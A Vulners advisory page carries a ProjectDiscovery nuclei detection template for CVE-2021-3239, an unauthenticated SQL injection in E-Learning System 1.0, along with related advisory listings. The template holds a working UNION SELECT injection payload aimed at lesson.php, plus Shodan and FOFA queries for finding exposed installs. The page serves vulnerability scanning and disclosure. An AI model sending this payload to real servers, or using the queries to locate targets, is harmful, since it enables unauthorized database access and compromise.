Lucene search
K

E-Learning System 1.0 - SQL Injection

🗓️ 03 Jun 2026 06:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

E-Learning System 1.0 suffers unauthenticated SQL injection enabling remote code execution and reverse shell.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
Sourcecodester Pisay Online E-Learning System SQL注入漏洞
15 Feb 202100:00
cnnvd
CNVD
Sourcecodester Pisay Online E-Learning System SQL Injection Vulnerability (CNVD-2021-95936)
9 Mar 202100:00
cnvd
CVE
CVE-2021-3239
15 Feb 202120:39
cve
Cvelist
CVE-2021-3239
15 Feb 202120:39
cvelist
NVD
CVE-2021-3239
15 Feb 202121:15
nvd
OSV
CVE-2021-3239
15 Feb 202121:15
osv
Prion
Sql injection
15 Feb 202121:15
prion
Positive Technologies
PT-2021-19699
15 Feb 202100:00
ptsecurity
RedhatCVE
CVE-2021-3239
22 May 202521:29
redhatcve
id: CVE-2021-3239

info:
  name: E-Learning System 1.0 - SQL Injection
  author: xuxeong
  severity: critical
  description: |
   E-Learning System 1.0 contains an unauthenticated SQL injection caused by unsanitized input, letting remote attackers execute arbitrary code on the server and gain a reverse shell, exploit requires no authentication.
  impact: |
   Attackers can execute arbitrary code on the server, leading to full system compromise and remote control.
  remediation: |
   Apply input validation and parameterized queries, update to the latest version if available.
  reference:
    - https://www.exploit-db.com/exploits/49434
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3239
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"E-Learning System"
    fofa-query: title="E-Learning System"
  tags: cve,cve2021,sqli,elearning,vuln

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/caiwl/lesson.php?id=-1%20UNION%20SELECT%201,2,md5({{num}}),4,5"
      - "{{BaseURL}}/lesson.php?id=-1%20UNION%20SELECT%201,2,md5({{num}}),4,5"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "c8c605999f3d8352d7bb792cf3fdb25b")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022049b04b82f30ea5febe14df770618af45aff8ce3af4f1abf8e9a5a13719448a530221009cea5e1a098a081dd49c3ea0411aa2846b15f9a967466df9aed9741d18fde3e1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jun 2026 06:03Current
7.8High risk
Vulners AI Score7.8
CVSS 27.5
CVSS 3.19.8
EPSS0.17933
13